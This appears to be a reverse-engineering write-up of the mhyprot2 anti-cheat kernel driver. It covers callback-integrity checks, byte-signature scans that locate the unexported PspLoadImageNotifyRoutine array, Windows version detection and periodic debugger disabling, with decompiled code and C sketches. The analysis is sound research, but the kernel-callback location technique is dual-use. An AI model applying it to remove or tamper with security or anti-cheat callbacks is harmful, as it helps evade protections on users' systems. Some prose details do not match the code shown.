<p><code>mhyprot2</code> is part of miHoYo’s client-side anti-cheat approach. Because kernel-mode drivers run with <em>system-level privilege</em>, these types of anticheat mechanisms often provoke controversy about users’ privacy, with many calling similar systems such as Riot’s Vanguard or EasyAntiCheat rootkits.</p>
<p>The following NT kernel APIs are used in <code>mhyprot2</code>:</p>
<ul>
<li><p>The <code>PsSetCreateProcessNotifyRoutine</code> routine adds a driver-supplied callback routine to, or removes it from, a list of routines to be called whenever a process is created or deleted.</p>
</li>
<li><p>The <code>PsSetCreateThreadNotifyRoutine</code> routine registers a driver-supplied callback that is subsequently notified when a new thread is created and when such a thread is deleted.</p>
</li>
<li><p>The <code>PsSetLoadImageNotifyRoutine</code> routine registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). This is the routine discussed here.</p>
</li>
</ul>
<p>The advantage of registering these callbacks is that <code>mhyprot2</code> learns whenever a module or component is mapped into the game process it protects. But what happens when a piece of malicious code removes mhyprot2’s callback routine from the system? A validation routine makes sure that the callback is still active.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN __stdcall <span class="hljs-title">IsLoadImageNotifyRoutineExists</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">char</span> *_pPspLoadImageNotifyRoutine; <span class="hljs-comment">// rax</span>
    <span class="hljs-keyword">int</span> Counter2; <span class="hljs-comment">// ebx</span>
    <span class="hljs-keyword">int</span> Counter; <span class="hljs-comment">// esi</span>
    __int64 i; <span class="hljs-comment">// r14</span>
    <span class="hljs-keyword">char</span> *CallbackBlock; <span class="hljs-comment">// rdi</span>
    __int64 RefCallbackBlock; <span class="hljs-comment">// rdi</span>
    __int64 j; <span class="hljs-comment">// rdx</span>

    _pPspLoadImageNotifyRoutine = (<span class="hljs-keyword">char</span> *)gpPspLoadImageNotifyRoutine;
    Counter2 = <span class="hljs-number">0</span>;
    <span class="hljs-comment">// if gpPspLoadImageNotifyRoutine not set, then set</span>
    <span class="hljs-keyword">if</span> ( !gpPspLoadImageNotifyRoutine )
    {
        _pPspLoadImageNotifyRoutine = FindPspRemoveLoadImageNotifyRoutine_sub_140006B24();
        gpPspLoadImageNotifyRoutine = (__int64)_pPspLoadImageNotifyRoutine;
        <span class="hljs-keyword">if</span> ( !_pPspLoadImageNotifyRoutine )
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }
    Counter = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>i64; ; i += <span class="hljs-number">8</span>i64 )
    {
        CallbackBlock = &amp;_pPspLoadImageNotifyRoutine[i];
        <span class="hljs-keyword">if</span> ( &amp;_pPspLoadImageNotifyRoutine[i] )
            <span class="hljs-keyword">break</span>;
ContinueEnumeration:
        <span class="hljs-comment">// Every callback-block arrays have up to 64 of its size</span>
        <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)++Counter &gt;= <span class="hljs-number">64</span> )
            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
    }
    <span class="hljs-keyword">if</span> ( !(<span class="hljs-keyword">unsigned</span> __int8)MmIsAddressValid(&amp;_pPspLoadImageNotifyRoutine[i])
        || (RefCallbackBlock = *(_QWORD *)CallbackBlock) == <span class="hljs-number">0</span>
        || !(<span class="hljs-keyword">unsigned</span> __int8)MmIsAddressValid(RefCallbackBlock)
        || *(<span class="hljs-keyword">void</span> (__fastcall **)(__int64, __int64))((RefCallbackBlock &amp; <span class="hljs-number">0xFFFFFFFFFFFFFFF0</span>ui64) + <span class="hljs-number">8</span>) != MhyLoadImageCallback )
    {
        _pPspLoadImageNotifyRoutine = (<span class="hljs-keyword">char</span> *)gpPspLoadImageNotifyRoutine;
        <span class="hljs-keyword">goto</span> ContinueEnumeration;
    }

    <span class="hljs-comment">// validate pointer</span>
    <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>i64; *(_DWORD *)((<span class="hljs-keyword">char</span> *)&amp;unk_14000A638 + j) == *(_DWORD *)((<span class="hljs-keyword">char</span> *)MhyLoadImageCallback + j); j += <span class="hljs-number">4</span>i64 )
    {
        <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)++Counter2 &gt;= <span class="hljs-number">8</span> )
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>To safeguard against potential tampering, <code>mhyprot2</code> implements a validation routine that ensures its callback routine remains active on the system. The detection logic first checks if the global pointer to <code>PspLoadImageNotifyRoutine</code> is set. If not set, it attempts to find and set it using a custom function. It then iterates through the callback blocks (up to 64 entries), validating each callback block and checking if it matches mhyprot's callback function pointer.</p>
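<p>In more detail, the <code>PspLoadImageNotifyRoutine</code> array pointer is obtained through the <code>FindPspRemoveLoadImageNotifyRoutine_sub_140006B24</code> function and cached in a global. The routine then walks the callback-block entries, skipping any slot that is empty or unreadable. Once it finds a block whose function pointer equals mhyprot's callback, it compares the first 32 bytes of that callback (eight DWORDs) against a reference copy stored in the driver and returns <code>TRUE</code> only if they all match, so the check covers both unregistration and patching of the callback's first instructions. Note that if the array cannot be located at all, the routine also returns <code>TRUE</code>.</p>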
<p>However, if no match is found after examining all entries, the function returns <code>FALSE</code>. This <code>FALSE</code> return could signify either that the callback was intentionally removed by malicious code attempting to bypass the anti-cheat system, or that it was never properly registered in the first place.</p>
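<p>The logic of that check can be reproduced in user mode with simulated data. In the sketch below, callbacks are represented by byte buffers standing in for code, slots hold tagged pointers whose low 4 bits are masked off, and the function pointer sits at offset 8 of the block on a 64-bit build, as in the decompiled routine. The type and function names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

#define SKETCH_MAX_CALLBACKS  64
#define SKETCH_PROLOGUE_BYTES 32

typedef struct {
    uint64_t       rundown;    /* placeholder for the field at offset 0 */
    const uint8_t *function;   /* callback address at offset 8 */
} SKETCH_CALLBACK_BLOCK;

/* Returns 1 if `slots` contains a block whose function pointer equals
   `expected_fn` and whose first 32 code bytes still match `reference`. */
int SketchCallbackIntact(const uintptr_t slots[SKETCH_MAX_CALLBACKS],
                         const uint8_t *expected_fn,
                         const uint8_t reference[SKETCH_PROLOGUE_BYTES])
{
    for (int i = 0; i &lt; SKETCH_MAX_CALLBACKS; ++i) {
        const SKETCH_CALLBACK_BLOCK *block;

        if (slots[i] == 0)
            continue;                       /* empty slot */
        block = (const SKETCH_CALLBACK_BLOCK *)(slots[i] &amp; ~(uintptr_t)0xF);
        if (block-&gt;function != expected_fn)
            continue;                       /* someone else's callback */

        /* Registered: now make sure the code itself was not patched. */
        return memcmp(expected_fn, reference, SKETCH_PROLOGUE_BYTES) == 0;
    }
    return 0;                               /* callback is no longer registered */
}
</code></pre>
<p>The prologue comparison is what catches an attacker who leaves the registration in place but overwrites the start of the callback with a jump or a return.</p>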
<h3 id="heading-dkom-countermeasures">DKOM Countermeasures</h3>
<p>To counter potential Direct Kernel Object Manipulation (DKOM) attacks, a technique often employed by malware to conceal processes or drivers, mhyprot2 uses signature scanning. This lets the anti-cheat driver locate the unexported functions and variables that its checks depend on.</p>
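<p><code>PspLoadImageNotifyRoutine</code> is not exported by <code>ntoskrnl</code>, because Microsoft does not recommend DKOM methods for device drivers. Instead, <code>mhyprot2</code> uses <code>FindPspRemoveLoadImageNotifyRoutine_sub_140006B24</code>, which resolves the exported <code>PsRemoveLoadImageNotifyRoutine</code> and scans the start of that function for the instruction that references the array.</p>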
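<p>The scan in the routine shown next looks for the bytes <code>48 8D 0D</code> followed by a 32-bit displacement and then <code>8B C6</code>, which decodes as <code>lea rcx, [rip+disp32]</code> followed by <code>mov eax, esi</code>. The target is the address right after the 7-byte LEA plus the displacement. Here is a user-mode sketch of that pattern match over a plain byte buffer, assuming a little-endian host. <code>SketchFindLeaTarget</code> is a hypothetical name.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Scan `code` for 48 8D 0D &lt;disp32&gt; 8B C6 and store the offset the LEA
   points at, relative to the start of `code`, in `*target_offset`.
   Returns 1 if the pattern was found, 0 otherwise. */
int SketchFindLeaTarget(const uint8_t *code, size_t len, long long *target_offset)
{
    for (size_t i = 0; i + 9 &lt;= len; ++i) {
        int32_t disp;

        if (code[i] != 0x48 || code[i + 1] != 0x8D || code[i + 2] != 0x0D ||
            code[i + 7] != 0x8B || code[i + 8] != 0xC6)
            continue;

        memcpy(&amp;disp, &amp;code[i + 3], sizeof(disp));   /* signed disp32 */
        *target_offset = (long long)i + 7 + disp;    /* RIP = end of the LEA */
        return 1;
    }
    return 0;
}
</code></pre>
<p>Signature scans like this are tied to specific kernel builds, which is why the driver branches on the Windows version before choosing a pattern.</p>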
<pre><code class="lang-c">RtlInitUnicodeString(&amp;DestinationString, <span class="hljs-string">L"PsRemoveLoadImageNotifyRoutine"</span>);
pPsRemoveLoadImageNotifyRoutine = (<span class="hljs-keyword">char</span> *)MmGetSystemRoutineAddress(&amp;DestinationString);
StubBase = pPsRemoveLoadImageNotifyRoutine;
<span class="hljs-keyword">if</span> ( pPsRemoveLoadImageNotifyRoutine )
{
    <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)gWinVer &gt;= <span class="hljs-number">61</span> )
    {
        <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)gWinVer &lt;= <span class="hljs-number">63</span> )     <span class="hljs-comment">// Windows 7 - 8.1</span>
        {
            MaxAddressToSearch = (<span class="hljs-keyword">unsigned</span> __int64)(pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">255</span>);
            <span class="hljs-keyword">while</span> ( (<span class="hljs-keyword">unsigned</span> __int64)StubBase &lt; MaxAddressToSearch )
            {
                <span class="hljs-keyword">if</span> ( *StubBase == <span class="hljs-number">0x48</span>
                  &amp;&amp; StubBase[<span class="hljs-number">1</span>] == <span class="hljs-number">0x8D</span>u
                  &amp;&amp; StubBase[<span class="hljs-number">2</span>] == <span class="hljs-number">0xD</span>
                  &amp;&amp; StubBase[<span class="hljs-number">7</span>] == <span class="hljs-number">0x8B</span>u
                  &amp;&amp; StubBase[<span class="hljs-number">8</span>] == <span class="hljs-number">0xC6</span>u )
                {
                    DerefPointer = &amp;StubBase[*(_DWORD *)(StubBase + <span class="hljs-number">3</span>) + <span class="hljs-number">7</span>];
ValidateAndReturn:
                    <span class="hljs-keyword">if</span> ( DerefPointer &amp;&amp; (<span class="hljs-keyword">unsigned</span> __int8)MmIsAddressValid(DerefPointer) )
                        <span class="hljs-keyword">goto</span> LABEL_26;
                    <span class="hljs-keyword">break</span>;
                }
                ++StubBase;
            }
        }
        <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ( gWinVer == <span class="hljs-number">100</span> )    <span class="hljs-comment">// Windows 10 (Major=10, Minor=0)</span>
        {
            <span class="hljs-keyword">for</span> ( i = (<span class="hljs-keyword">unsigned</span> __int64)(pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">12</span>);
                  i &lt; (<span class="hljs-keyword">unsigned</span> __int64)(pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">255</span>);
                  ++i )
            {
                <span class="hljs-keyword">if</span> ( *(_BYTE *)(i - <span class="hljs-number">2</span>) == <span class="hljs-number">0x33</span>
                  &amp;&amp; *(_BYTE *)(i + <span class="hljs-number">1</span>) == <span class="hljs-number">0x8D</span>u
                  &amp;&amp; *(_BYTE *)(i - <span class="hljs-number">9</span>) == <span class="hljs-number">0x44</span>
                  &amp;&amp; *(_BYTE *)(i - <span class="hljs-number">10</span>) == <span class="hljs-number">0x66</span>
                  &amp;&amp; *(_BYTE *)(i - <span class="hljs-number">11</span>) == <span class="hljs-number">0x48</span> )
                {
                    DerefPointer = (<span class="hljs-keyword">char</span> *)(i + *(_DWORD *)(i + <span class="hljs-number">3</span>) + <span class="hljs-number">7</span>);
                    <span class="hljs-keyword">goto</span> ValidateAndReturn;
                }
            }
        }
    }
}
DerefPointer = <span class="hljs-number">0</span>i64;
</code></pre>
<p>The driver first obtains the address of <code>PsRemoveLoadImageNotifyRoutine</code> using the <code>MmGetSystemRoutineAddress</code> function. This serves as the starting point for the scan. It then scans the 255 bytes (0xFF in hexadecimal) that follow this address. This range is chosen because the body of <code>PsRemoveLoadImageNotifyRoutine</code> contains an instruction that references the <code>PspLoadImageNotifyRoutine</code> array, so the array's address can be recovered from that instruction's operand.</p>
<p>If a match for the signature pattern is found within this range, mhyprot2 dereferences the address, performs validation checks, and if successful, returns this address as the location of the <code>PspLoadImageNotifyRoutine</code> array. In the event that no matching pattern is found within the specified range, the system falls back to returning the function pointer of <code>PsRemoveLoadImageNotifyRoutine</code> itself.</p>
<p>The signature depends on the Windows version in use. For Windows 7 through 8.1, mhyprot2 searches for the pattern <code>\x48\x8D\x0D\x00\x00\x00\x00\x8B\xC6</code>, using the mask <code>xxx????xx</code>. This corresponds to the instruction <code>lea rcx, PspLoadImageNotifyRoutine</code> followed by <code>mov eax, esi</code>.</p>
<p>For Windows 10 and later, it uses a different pattern: <code>\x48\x66\x44\x00\x00\x00\x00\x00\x00\x33\x00\x00\x8D</code>, with the mask <code>xxx??????x??x</code>. This pattern identifies a nearby instruction sequence unique to newer Windows versions.</p>
<p>These byte sequences serve as fingerprints for locating the <code>PspLoadImageNotifyRoutine</code> array in memory.</p>
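<p>A pattern-and-mask scan of this kind can be sketched in portable C. This is an illustrative user-mode model rather than the driver's routine: <code>find_signature</code> and <code>resolve_rip_relative</code> are hypothetical helpers, and the displacement read assumes a little-endian host, as on x64.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Returns the offset of the first masked match in buf, or -1 if none.
   In mask, 'x' marks a byte that must match and '?' marks a wildcard. */
ptrdiff_t find_signature(const uint8_t *buf, size_t len,
                         const uint8_t *pattern, const char *mask)
{
    size_t plen = strlen(mask);
    if (plen == 0 || plen &gt; len)
        return -1;
    for (size_t i = 0; i + plen &lt;= len; ++i) {
        size_t j = 0;
        while (j &lt; plen &amp;&amp; (mask[j] == '?' || buf[i + j] == pattern[j]))
            ++j;
        if (j == plen)
            return (ptrdiff_t)i;
    }
    return -1;
}

/* Resolves the target of a 7-byte RIP-relative instruction such as
   48 8D 0D disp32 located at insn_off. The result is an offset from
   the start of buf: next instruction + signed 32-bit displacement. */
int64_t resolve_rip_relative(const uint8_t *buf, size_t insn_off)
{
    int32_t disp;
    memcpy(&amp;disp, buf + insn_off + 3, sizeof disp); /* avoids an unaligned read */
    return (int64_t)insn_off + 7 + disp;
}
</code></pre>
<p>The <code>+ 3</code> and <code>+ 7</code> mirror the decompiled expression <code>&amp;StubBase[*(_DWORD *)(StubBase + 3) + 7]</code>: three opcode bytes precede the displacement, and the displacement is relative to the end of the seven-byte instruction.</p>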
<pre><code class="lang-c">PAGE:<span class="hljs-number">0000000140</span>CAD62    lea     rcx, PspLoadImageNotifyRoutine
PAGE:<span class="hljs-number">0000000140</span>CAD69    lea     rbp, [rcx+rdi*<span class="hljs-number">8</span>]
PAGE:<span class="hljs-number">0000000140</span>CAD70    mov     rcx, rbp
PAGE:<span class="hljs-number">0000000140</span>CAD73    call    ExReferenceCallBackBlock
PAGE:<span class="hljs-number">0000000140</span>CAD78    mov     rbx, rax
PAGE:<span class="hljs-number">0000000140</span>CAD7B    test    rax, rax
PAGE:<span class="hljs-number">0000000140</span>CAD7E    jz      <span class="hljs-keyword">short</span> loc_140CAD9F
PAGE:<span class="hljs-number">0000000140</span>CAD80    cmp     [rax+<span class="hljs-number">8</span>], r14
PAGE:<span class="hljs-number">0000000140</span>CAD84    jnz     <span class="hljs-keyword">short</span> loc_140CAD94
PAGE:<span class="hljs-number">0000000140</span>CAD86    mov     r8, rax
PAGE:<span class="hljs-number">0000000140</span>CAD89    <span class="hljs-keyword">xor</span>     edx, edx
PAGE:<span class="hljs-number">0000000140</span>CAD8B    mov     rcx, rbp
PAGE:<span class="hljs-number">0000000140</span>CAD8E    call    ExCompareExchangeCallBack
PAGE:<span class="hljs-number">0000000140</span>CAD93    test    al, al
</code></pre>
<p>The code first locates a specific callback within the array using an index. It then employs a careful process to safely reference and potentially modify the callback. This involves using <code>ExReferenceCallBackBlock</code> to ensure the callback isn't deallocated during the operation, followed by an integrity check comparing the callback to an expected value.</p>
<p>If the integrity check passes, the code prepares to modify the callback using <code>ExCompareExchangeCallBack</code>. This function likely performs an atomic compare-and-exchange operation, allowing for thread-safe modification of the callback.</p>
<h3 id="heading-windows-version-detection">Windows Version Detection</h3>
<p>Since <code>ntoskrnl</code> differs between Windows versions, the driver needs to know which version it is running on. It tracks this in <code>gWinVer</code>, which is set by <code>GetAndSetGlobalVersionVariable</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">char</span> <span class="hljs-title">GetAndSetGlobalVersionVariable</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">int</span> minorVersion; <span class="hljs-comment">// [rsp+30h] [rbp+8h]</span>
    <span class="hljs-keyword">int</span> majorVersion; <span class="hljs-comment">// [rsp+38h] [rbp+10h]</span>

    <span class="hljs-keyword">if</span> ( gWinVer )
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    majorVersion = <span class="hljs-number">0</span>;
    minorVersion = <span class="hljs-number">0</span>;
    PsGetVersion (&amp;majorVersion, &amp;minorVersion, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64);
    <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">5</span> )
    {
        <span class="hljs-keyword">if</span> (minorVersion == <span class="hljs-number">1</span> )
        {
        gWinVer = <span class="hljs-number">51</span>;
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">6</span> )             <span class="hljs-comment">// Windows Vista - 8.1</span>
    {
        <span class="hljs-keyword">switch</span> ( minorVersion )
        {
          <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:
            gWinVer = <span class="hljs-number">61</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
          <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:
            gWinVer = <span class="hljs-number">62</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
          <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:
            gWinVer = <span class="hljs-number">63</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">10</span> &amp;&amp; !minorVersion )
    {
        gWinVer = <span class="hljs-number">100</span>;
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }
    gWinVer = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>The function begins by checking if a global version variable (<code>gWinVer</code>) has already been set. If it has, the function immediately returns, avoiding redundant version checks. This approach optimizes performance by ensuring the potentially time-consuming version detection process occurs only once during the driver's operation.</p>
<p>If the global version variable hasn't been set, the function proceeds to use the <code>PsGetVersion</code> API. This API call retrieves the major and minor version numbers of the operating system. Interestingly, mhyprot2 uses <code>PsGetVersion</code> despite it being considered obsolete after Windows XP, having been replaced by <code>RtlGetVersion</code> in more recent Windows versions.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>majorVersion</td><td>minorVersion</td><td>gWinVer</td><td>Product</td></tr>
</thead>
<tbody>
<tr>
<td>5</td><td>1</td><td>51</td><td>Windows XP</td></tr>
<tr>
<td>6</td><td>1</td><td>61</td><td>Windows 7</td></tr>
<tr>
<td>6</td><td>2</td><td>62</td><td>Windows 8</td></tr>
<tr>
<td>6</td><td>3</td><td>63</td><td>Windows 8.1</td></tr>
<tr>
<td>10</td><td>0</td><td>100</td><td>Windows 10</td></tr>
</tbody>
</table>
</div><p>If the detected version doesn't match any of these known configurations, <code>gWinVer</code> is set to 0, likely indicating an unknown or unsupported Windows version.</p>
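<p>The mapping in the table can be written as a small pure function. This is a sketch under the assumption that only the listed versions are recognised; <code>encode_win_ver</code> is a hypothetical name and does not appear in the driver.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Mirrors the table above: returns the compact identifier,
   or 0 when the version is not one of the recognised ones. */
uint32_t encode_win_ver(uint32_t major, uint32_t minor)
{
    if (major == 5 &amp;&amp; minor == 1)
        return 51;                          /* Windows XP */
    if (major == 6 &amp;&amp; minor &gt;= 1 &amp;&amp; minor &lt;= 3)
        return 60 + minor;                  /* Windows 7, 8, 8.1 */
    if (major == 10 &amp;&amp; minor == 0)
        return 100;                         /* Windows 10 */
    return 0;                               /* unknown or unsupported */
}
</code></pre>
<p>Note that version 6.0 (Windows Vista) falls through to 0, consistent with the <code>switch</code> in the decompiled function handling only minor versions 1 through 3.</p>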
<p>The choice to use <code>PsGetVersion</code> might be driven by compatibility concerns. It's possible that the developers of mhyprot2 wanted to ensure their anti-cheat system could function on a wide range of Windows versions, including older systems that might still be in use in some markets. This backward compatibility could be particularly important in regions where older hardware and operating systems remain prevalent.</p>
<h3 id="heading-validation-routine">Validation Routine</h3>
<p>The Validation Routine is a critical component of mhyprot2's integrity checking mechanism. This routine is designed to ensure that all the anti-cheat system's protective measures remain active and uncompromised during the game's operation. The routine is implemented through a function that we can refer to as <code>CheckForAllCallbacks</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">CheckForAllCallbacks</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">return</span> !GetAndSetGlobalVersionVariable()
    || IsgpPspLoadImageNotifyRoutineValid()
    &amp;&amp; IsLoadImageNotifyRoutineExist()
    &amp;&amp; IsProcessCreateNotifyRoutineExist()
    &amp;&amp; IsCreateThreadNotifyRoutineExist();
}
</code></pre>
<p>This function performs a series of checks to validate the integrity of various callback routines essential to mhyprot2's operation. Let's examine each component of this validation process:</p>
<ol>
<li><p><code>GetAndSetGlobalVersionVariable()</code>: This call ensures that the Windows version has been detected and cached in <code>gWinVer</code>. It returns 1 on success and 0 when the version is unsupported. In the latter case the negation makes the left-hand side of the <code>||</code> true, so the remaining checks are skipped.</p>
</li>
<li><p><code>IsgpPspLoadImageNotifyRoutineValid()</code>: This check verifies the validity of the global pointer to the PspLoadImageNotifyRoutine. It's crucial for ensuring that the system can properly monitor image loading events.</p>
</li>
<li><p><code>IsLoadImageNotifyRoutineExist()</code>: This function confirms that the Load Image Notify Routine is still registered and active. This routine is vital for detecting when new modules or DLLs are loaded into the game process.</p>
</li>
<li><p><code>IsProcessCreateNotifyRoutineExist()</code>: This check ensures that the Process Create Notify Routine is still in place. This routine allows mhyprot2 to monitor the creation of new processes, which is essential for detecting potential cheat launchers or injectors.</p>
</li>
<li><p><code>IsCreateThreadNotifyRoutineExist()</code>: This function verifies that the Create Thread Notify Routine is active. This routine enables mhyprot2 to monitor thread creation, which is crucial for detecting certain types of code injection techniques.</p>
</li>
</ol>
<p>Because <code>&amp;&amp;</code> binds tighter than <code>||</code>, the expression as decompiled evaluates to true when all four callback checks pass, and also when version detection fails and the checks are skipped. A false result means that the version was detected but at least one check failed, which could indicate that the anti-cheat system has been compromised or disabled in some way.</p>
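<p>The way the decompiled expression groups can be checked with a stand-alone model. In this sketch the five booleans stand in for the results of the five calls; <code>check_all_model</code> is a hypothetical name used only for illustration.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;

/* Models `!A || B &amp;&amp; C &amp;&amp; D &amp;&amp; E` with the grouping made explicit.
   version_ok stands in for GetAndSetGlobalVersionVariable(). */
bool check_all_model(bool version_ok, bool ptr_valid,
                     bool image_cb, bool process_cb, bool thread_cb)
{
    return !version_ok
        || (ptr_valid &amp;&amp; image_cb &amp;&amp; process_cb &amp;&amp; thread_cb);
}
</code></pre>
<p>Under this model a failed version lookup yields <code>true</code> regardless of the callback state, so a caller cannot tell that case apart from a fully intact set of callbacks.</p>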
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS <span class="hljs-title">MhyChecksumForever</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">unsigned</span> __int64 v0; <span class="hljs-comment">// rbx</span>
    <span class="hljs-keyword">char</span> Dest; <span class="hljs-comment">// [rsp+30h] [rbp-D0h]</span>
    <span class="hljs-keyword">char</span> v3; <span class="hljs-comment">// [rsp+168h] [rbp+68h]</span>
    <span class="hljs-keyword">int</span> v4; <span class="hljs-comment">// [rsp+170h] [rbp+70h]</span>
    <span class="hljs-keyword">int</span> v5; <span class="hljs-comment">// [rsp+178h] [rbp+78h]</span>

    v0 = <span class="hljs-number">1</span>i64;
    sub_1400014E0();
    v4 = <span class="hljs-number">1</span>;
    _InterlockedCompareExchange(&amp;v4, <span class="hljs-number">-1</span>, dword_14000A6E8);
    <span class="hljs-keyword">while</span> ( v4 != <span class="hljs-number">-1</span> )
    {
        v5 = <span class="hljs-number">0</span>;
        _InterlockedCompareExchange(&amp;v5, <span class="hljs-number">-1</span>, dword_14000A010);
        <span class="hljs-keyword">if</span> ( v5 == <span class="hljs-number">-1</span> )
        {
            <span class="hljs-keyword">if</span> ( dword_14000A6FC &lt;= <span class="hljs-number">0</span> )
            {
                ++dword_14000A6FC;
                sub_140997500(&amp;Dest, <span class="hljs-number">0</span>i64, <span class="hljs-number">256</span>i64);
                <span class="hljs-built_in">sprintf</span>(&amp;Dest, <span class="hljs-number">0x100</span>ui64, <span class="hljs-string">"Status false\r\n"</span>);
                <span class="hljs-built_in">snprintf</span>(&amp;Dest, <span class="hljs-number">0</span>i64, <span class="hljs-number">256</span>i64);
                sub_1409059EC(<span class="hljs-number">0</span>i64, &amp;Dest);
                _InterlockedExchange(&amp;dword_14000A6F8, <span class="hljs-number">1</span>);
            }
        }
        <span class="hljs-keyword">else</span>
        {
            _InterlockedAdd(&amp;dword_14000A010, <span class="hljs-number">0xFFFFFFFF</span>);
            <span class="hljs-keyword">if</span> ( v0 % <span class="hljs-number">0x32</span> == <span class="hljs-number">11</span> )
            {
                v3 = <span class="hljs-number">0</span>;
                KdChangeOption(<span class="hljs-number">0</span>i64, <span class="hljs-number">1</span>i64, &amp;v3, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64);
                KdDisableDebugger();
                LOBYTE(KdDebuggerEnabled) = <span class="hljs-number">0</span>;
                <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> __int8)sub_140001490() == <span class="hljs-number">1</span> )
                    _InterlockedExchange(&amp;dword_14000A6EC, <span class="hljs-number">3</span>);
            }
        }
        <span class="hljs-keyword">if</span> ( v0 == <span class="hljs-number">50</span> * (v0 / <span class="hljs-number">0x32</span>) &amp;&amp; CheckForBothObAndAllPsCallbacks() )
            _InterlockedExchange(&amp;dword_14000A6EC, <span class="hljs-number">3</span>);
        <span class="hljs-keyword">if</span> ( v0 % <span class="hljs-number">0x1E</span> == <span class="hljs-number">11</span> &amp;&amp; Object )
            KeSetEvent((PRKEVENT)Object, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        MhySleepKernelThread(<span class="hljs-number">100</span>);
        ++v0;
        sub_1400014E0();
        v4 = <span class="hljs-number">1</span>;
        _InterlockedCompareExchange(&amp;v4, <span class="hljs-number">-1</span>, dword_14000A6E8);
    }
    <span class="hljs-keyword">return</span> PsTerminateSystemThread(<span class="hljs-number">0</span>);
}
</code></pre>
<p>In this context, <code>CheckForBothObAndAllPsCallbacks</code> likely includes the <code>CheckForAllCallbacks</code> function along with additional checks for Object Manager callbacks (<code>ObRegisterCallbacks</code>).</p>
<p>The interesting part is the <code>KdDisableDebugger</code> call in <code>MhyChecksumForever</code>: this newer version of <code>mhyprot</code> implements kernel debugger detection and periodically attempts to disable an attached debugger.</p>
<pre><code class="lang-cpp">        {
            _InterlockedAdd(&amp;dword_14000A010, <span class="hljs-number">0xFFFFFFFF</span>);
            <span class="hljs-keyword">if</span> ( v0 % <span class="hljs-number">0x32</span> == <span class="hljs-number">11</span> )
            {
                v3 = <span class="hljs-number">0</span>;
                KdChangeOption(<span class="hljs-number">0</span>i64, <span class="hljs-number">1</span>i64, &amp;v3, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64);
                KdDisableDebugger();
                LOBYTE(KdDebuggerEnabled) = <span class="hljs-number">0</span>;
                <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> __int8)sub_140001490() == <span class="hljs-number">1</span> )
                    _InterlockedExchange(&amp;dword_14000A6EC, <span class="hljs-number">3</span>);
            }
        }
</code></pre>
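<p>Between iterations the thread sleeps for 100 milliseconds. <code>KeDelayExecutionThread</code> takes its interval in 100-nanosecond units, with negative values meaning a relative delay, so <code>-10000 * Second</code> is a delay in milliseconds despite the parameter's name.</p>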
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS __fastcall <span class="hljs-title">MhySleepKernelThread</span><span class="hljs-params">(<span class="hljs-keyword">int</span> Second)</span>
</span>{
    LARGE_INTEGER Interval; <span class="hljs-comment">// [rsp+38h] [rbp+10h]</span>

    Interval.QuadPart = <span class="hljs-number">-10000</span> * Second;
    <span class="hljs-keyword">return</span> KeDelayExecutionThread(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,&amp;Interval);
}
</code></pre>
